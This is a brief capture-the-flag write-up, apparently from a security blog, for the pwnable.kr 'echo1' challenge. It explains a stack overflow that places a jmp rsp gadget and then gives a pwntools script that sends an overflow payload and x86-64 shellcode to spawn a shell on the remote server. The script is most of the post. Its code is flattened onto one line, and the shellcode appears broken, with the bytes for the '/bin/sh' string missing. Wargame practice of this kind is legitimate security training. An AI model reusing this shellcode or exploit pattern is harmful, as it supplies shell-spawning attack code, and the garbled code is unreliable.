History view
Writeup - pwnable.kr
Sabiendo que tenemos un overflow y la dirección de retorno en el stack, podríamos escribe en el bufferjmp rsp. Segundo aprovecharemos el overflow para escribir en la dirección de retorno justo la dirección del bufferjmp rspy seguidamente el shellcode. PWNED.
Exploit
from pwn import * import time context.log_level = 'debug' p = remote ( "pwnable.kr" , 9010 ) #p = process ('./echo1') # gdb.attach (p, '' ' #break * 0x0000000000400818 #continue #' '') shellcode = "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\x48\x31\xf6\x48\x31\xd2\x0f\x05 " p. recvuntil ( "hey, what's your name?" ) p.sendline (asm ( "jmp rsp" , arch = 'amd64' , os = 'linux' )) p.recvuntil ( ">" ) p.sendline ( "1" ) sleep ( 1 ) p.sendline ( "AAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGG\xa0\x20\x60\x00\x00\x00\x00\x00"+shellcode) p.interactive ()
'Pwning in Linux' 카테고리의 다른 글
| Armoury - Pragyan CTF 19 (2) | 2019.03.10 |
|---|---|
| Secret Keeper - Pragyan CTF 19 (0) | 2019.03.09 |
| Exploit - Two targets pwnable.xyz (0) | 2019.03.01 |
| Exploit - Note pwnable.xyz (0) | 2019.03.01 |
| Exploit - Misalignment pwnable.xyz (0) | 2019.03.01 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- Backdoors
- html injection
- fake stack frame
- theFaunia course
- leak libc
- ASM
- 32Bit
- GOT Dereferencing/Overwriting
- arithmetic overflow/underflow
- buffer overflow
- pwnable.tw
- pwnable.xyz
- return oriented programming
- open-redirect
- stack pivot
- XSS
- leak stack memory address
- Pwnable.kr
- format string
- one gadget
- shellcode
- use after free
- Windows
- cracking
- canary
- Call oriented programming
- dnspy
- hijacking redirection flow
- x64dbg
- write primitive
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 |
Archives